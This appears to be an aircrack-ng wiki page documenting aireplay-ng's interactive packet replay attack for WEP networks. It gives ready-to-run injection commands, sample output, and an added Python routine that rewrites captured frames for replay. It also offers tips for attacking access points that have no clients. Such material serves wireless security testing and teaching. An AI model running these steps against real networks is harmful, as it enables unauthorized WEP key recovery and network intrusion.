Interactive packet replay

Description

This attack lets you choose a specific captured packet and replay (inject) it. The packets to choose from can come from two sources: a live flow of packets from your wireless card, or a pcap file. The standard pcap format (Packet CAPture, associated with the libpcap library, http://www.tcpdump.org) is recognized by most commercial and open-source traffic capture and analysis tools. Reading from a file is an often overlooked feature of aireplay-ng: it lets you replay packets from other capture sessions, and several of the attacks write pcap files specifically for easy reuse. A common use is reading a file containing a packet you created with packetforge-ng.

Usage

aireplay-ng -2 <filter options> <replay options> -r <file name> <replay interface>

Where:

  • -2 means the interactive replay attack
  • <filter options> are described on the aireplay-ng page
  • <replay options> are described on the aireplay-ng page
  • -r <file name> specifies a pcap file to read packets from (optional; without it, packets are read live from the interface)
  • <replay interface> is the wireless interface, such as ath0

Usage Examples

You could use it, for example, to have the access point (AP) rebroadcast the packet and thereby generate new initialization vectors (IVs):

 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82  ath0

Where:

  • -2 means the interactive replay attack
  • -p 0841 sets the Frame Control field so that the packet looks like it is being sent from a wireless client to the AP (data frame with the ToDS and WEP bits set).
  • -c FF:FF:FF:FF:FF:FF sets the destination MAC address to broadcast. This is required to make the AP re-broadcast the packet, which is what produces the new IV.
  • -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
  • -h 00:0F:B5:88:AC:82 sets the source MAC address of the transmitted packets; it should match your card's MAC address.
  • ath0 is the wireless interface name.

The number of IVs generated per second varies with the size of the packet you select: the smaller the packet, the higher the rate. When launched, the program looks as follows:

 Read 99 packets...
 
      Size: 139, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  01:00:5E:00:00:FB
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 0100 5e00 00fb 0014 6c7e 4080  .B....^.....l~@.
      0x0010:  0040 f477 e5c9 5065 917f 0000 e053 b683  .@.w..Pe....S..
      0x0020:  fff3 795e 19a3 3313 b62c c9f3 c373 ef3e  ..y^..3..,...s.>
      0x0030:  87a0 751a 7d20 9e6c 59af 4d53 16d8 773c  ..u.} .lY.MS..w<
      0x0040:  af05 1021 8069 bbc8 06ea 59f3 3912 09a9  ...!.i....Y.9...
      0x0050:  c36d 1db5 a51e c627 11d1 d18c 2473 fae9  .m.....'....$s..
      0x0060:  84c0 7afa 8b84 ebbb e4d2 4763 44ae 69ea  ..z.......GcD.i.
      0x0070:  b65b df63 8893 279b 6ecf 1af8 c889 57f3  .[.c..'.n.....W.
      0x0080:  fea7 d663 21a6 3329 28c8 8f              ...c!.3)(..
 
 Use this packet ? 

Responding “y” results in the packets being injected:

 Saving chosen packet in replay_src-0303-103920.cap
 You should also start airodump-ng to capture replies.
 
 Sent 4772 packets...

By also including packet size filters you can easily use attack 2 to manually replay WEP-encrypted ARP request packets. Encrypted ARP frames are typically either 68 bytes (from a wireless client) or 86 bytes (from a wired client): 68 is a 24-byte 802.11 header, 4-byte IV, 8-byte LLC/SNAP header, 28-byte ARP payload and 4-byte ICV, while an ARP that entered via the wired side is padded to the 46-byte Ethernet minimum payload, giving 86:

aireplay-ng -2 -p 0841 -m 68 -n 86 -b 00:14:6C:7E:40:80 -c FF:FF:FF:FF:FF:FF -h 00:0F:B5:88:AC:82 ath0

Where:

  • -2 means the interactive replay attack
  • -p 0841 sets the Frame Control field so that the packet looks like it is being sent from a wireless client to the AP (data frame with the ToDS and WEP bits set).
  • -m 68 is the minimum packet length
  • -n 86 is the maximum packet length
  • -c FF:FF:FF:FF:FF:FF sets the destination MAC address to broadcast. This is required to make the AP re-broadcast the packet, which is what produces the new IV.
  • -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
  • -h 00:0F:B5:88:AC:82 sets the source MAC address of the transmitted packets; it should match your card's MAC address.
  • ath0 is the wireless interface name.

Once you start the program it looks as follows:

 Read 145 packets...
 
      Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
      0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
      0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
      0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
      0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
      0x0050:  78ed eeb3 6cc4                           x...l.
 
 Use this packet ? y

The -m/-n filter admits anything between 68 and 86 bytes, so at this point only respond “y” if the packet is exactly 68 or 86 bytes long; otherwise enter “n”. It now injects the packets:

 Saving chosen packet in replay_src-0303-124624.cap
 You should also start airodump-ng to capture replies.

As mentioned earlier, aireplay-ng can also replay packets from a pcap file. Notice that in the previous example aireplay-ng wrote a file called “replay_src-0303-124624.cap”. You are not limited to files written by aireplay-ng; you can use any pcap file from airodump-ng, kismet, etc.

Here is an example using the output from the previous example:

aireplay-ng -2 -p 0841 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -r replay_src-0303-124624.cap ath0

Where:

  • -2 means the interactive replay attack
  • -p 0841 sets the Frame Control field so that the packet looks like it is being sent from a wireless client to the AP (data frame with the ToDS and WEP bits set).
  • -c FF:FF:FF:FF:FF:FF is not included here, because the saved ARP packet already has its destination MAC address set to broadcast.
  • -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
  • -h 00:0F:B5:88:AC:82 sets the source MAC address of the transmitted packets; it should match your card's MAC address.
  • ath0 is the wireless interface name.

The program responds:

      Size: 86, FromDS: 1, ToDS: 0 (WEP)
 
           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  FF:FF:FF:FF:FF:FF
      Source MAC  =  00:40:F4:77:E5:C9
 
      0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
      0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
      0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
      0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
      0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
      0x0050:  78ed eeb3 6cc4                           x...l.
 
 Use this packet ? y

You then say “y” to select the packet, and it starts to inject the packets:

 Saving chosen packet in replay_src-0303-124624.cap
 You should also start airodump-ng to capture replies.
 
 End of file.
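The three examples above all rely on the same transformation: a captured FromDS WEP data frame is filtered by BSSID and size, and then rebuilt as a ToDS frame (the -p 0841 Frame Control) addressed to the AP, with our MAC as source and broadcast as destination, while the IV and ciphertext are left untouched so the AP decrypts and re-encrypts them under a fresh IV. The following Python is an added illustration of that frame rewrite and is not aireplay-ng's own code; aireplay-ng's internal handling of -p/-c/-h may differ in detail. It takes the 86-byte frame from the dump above as its input, and the address layout it applies (addr1 = BSSID, addr2 = SA, addr3 = DA for a ToDS frame) is the standard 802.11 one. Everything else (function names, the 3-address-only restriction) is the example's own choice.

```python
"""
Added worked example (not aireplay-ng code): parse the 802.11 header of a
captured WEP data frame, apply -b / -m / -n style filters, and rebuild the
frame as the "-p 0841 -h <our MAC> -c ff:ff:ff:ff:ff:ff" replay needs it.
"""

# The 86-byte FromDS WEP frame from the page's dump (wire order).
PAGE_FRAME_HEX = (
    "0842 0000 ffff ffff ffff 0014 6c7e 4080"
    "0040 f477 e5c9 9075 a09c 0000 d697 eb34"
    "e880 9a37 8bda d0e7 fdb4 252d d235 313c"
    "16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d"
    "7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43"
    "78ed eeb3 6cc4"
)
PAGE_FRAME = bytes.fromhex(PAGE_FRAME_HEX.replace(" ", ""))

FLAG_TODS, FLAG_FROMDS, FLAG_PROTECTED = 0x01, 0x02, 0x40  # Frame Control flags byte


def mac(b):
    return ":".join(f"{x:02X}" for x in b)


def unmac(s):
    return bytes.fromhex(s.replace(":", ""))


def parse_data_frame(frame):
    """Header fields of a 3-address 802.11 data frame (no QoS, no WDS 4th address)."""
    if len(frame) < 24:
        raise ValueError("too short for an 802.11 header")
    fc0, flags = frame[0], frame[1]
    if (fc0 >> 2) & 0x3 != 2:
        raise ValueError("not a data frame")
    to_ds, from_ds = bool(flags & FLAG_TODS), bool(flags & FLAG_FROMDS)
    if to_ds and from_ds:
        raise ValueError("WDS (4-address) frames not handled here")
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    # Which address is DA/SA/BSSID depends on the DS bits (standard 802.11 rule).
    if from_ds:
        da, bssid, sa = a1, a2, a3
    elif to_ds:
        bssid, sa, da = a1, a2, a3
    else:
        da, sa, bssid = a1, a2, a3
    return {"fc": bytes(frame[:2]), "to_ds": to_ds, "from_ds": from_ds,
            "protected": bool(flags & FLAG_PROTECTED),
            "da": mac(da), "sa": mac(sa), "bssid": mac(bssid), "size": len(frame)}


def matches_filter(frame, bssid=None, min_len=None, max_len=None, require_wep=True):
    """The checks the page's -b / -m / -n options describe, plus 'must be WEP'."""
    try:
        h = parse_data_frame(frame)
    except ValueError:
        return False
    if require_wep and not h["protected"]:
        return False
    if bssid and h["bssid"].upper() != bssid.upper():
        return False
    if min_len is not None and h["size"] < min_len:
        return False
    if max_len is not None and h["size"] > max_len:
        return False
    return True


def rewrite_for_replay(frame, smac, bssid, dmac=None, fctrl=0x0841):
    """
    Build the frame to inject. fctrl is read as the two wire-order Frame Control
    bytes (0x0841 -> 08 41: data frame, ToDS + WEP), the way the page writes
    -p 0841. Addresses go in ToDS order (addr1=BSSID, addr2=SA, addr3=DA); the
    DA defaults to the captured frame's DA (the page's third example relies on
    the ARP already being broadcast). Everything after the 24-byte header, i.e.
    the WEP IV and ciphertext, is copied verbatim: the AP decrypts it and
    re-encrypts the rebroadcast with a new IV, which is the whole point.
    """
    h = parse_data_frame(frame)
    flags = fctrl & 0xFF
    if (fctrl >> 8) != 0x08 or not (flags & FLAG_TODS) or (flags & FLAG_FROMDS):
        raise ValueError("this helper only builds plain ToDS data frames")
    hdr = bytes([fctrl >> 8, flags]) + frame[2:4]           # FC + duration/ID kept
    hdr += unmac(bssid) + unmac(smac) + unmac(dmac or h["da"])
    hdr += frame[22:24]                                      # sequence control kept
    return hdr + frame[24:]


def demo():
    """Run the page's second/third example on the captured frame; return (header, frame)."""
    our_mac, ap = "00:0F:B5:88:AC:82", "00:14:6C:7E:40:80"
    if not matches_filter(PAGE_FRAME, bssid=ap, min_len=68, max_len=86):
        raise RuntimeError("frame would not pass the -b/-m/-n filter")
    out = rewrite_for_replay(PAGE_FRAME, smac=our_mac, bssid=ap)
    return parse_data_frame(out), out


if __name__ == "__main__":
    header, out = demo()
    print(header)
    print(out.hex())
```

Running it prints the header of the rebuilt frame (ToDS set, BSSID 00:14:6C:7E:40:80, source 00:0F:B5:88:AC:82, broadcast destination) followed by its hex; the last 62 bytes are identical to the captured frame. Note that the AP only honours such a frame if it considers the source MAC associated, which is why the troubleshooting section below points at fake authentication.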

Usage Tips

There are some interesting applications of the first example above. It can be used to attack networks without any connected wireless clients (after fake authentication; see the troubleshooting section below). Start the aireplay-ng attack per the example, then sit back and wait for any packet to be broadcast. It does not matter what type it is: just say “y” and you are generating IVs. The tradeoff is speed, since big packets yield fewer IVs per second. The major advantage is that it saves the steps of obtaining the XOR keystream (chopchop or fragmentation attacks), building a packet and launching the replay attack.

This also works on APs with clients, and is faster to get going because you do not have to wait for an ARP: any packet will do.

Usage Troubleshooting

The most common problem is that you are not associated with the AP. Either use a source MAC address of a client already associated with the AP or use fake authentication.

Check the “I am injecting but the IVs don't increase” tutorial.

Also see the general aireplay-ng troubleshooting ideas: aireplay-ng usage troubleshooting.

interactive_packet_replay.1173798568.txt.gz · Last modified: 2007/03/13 16:09 (external edit)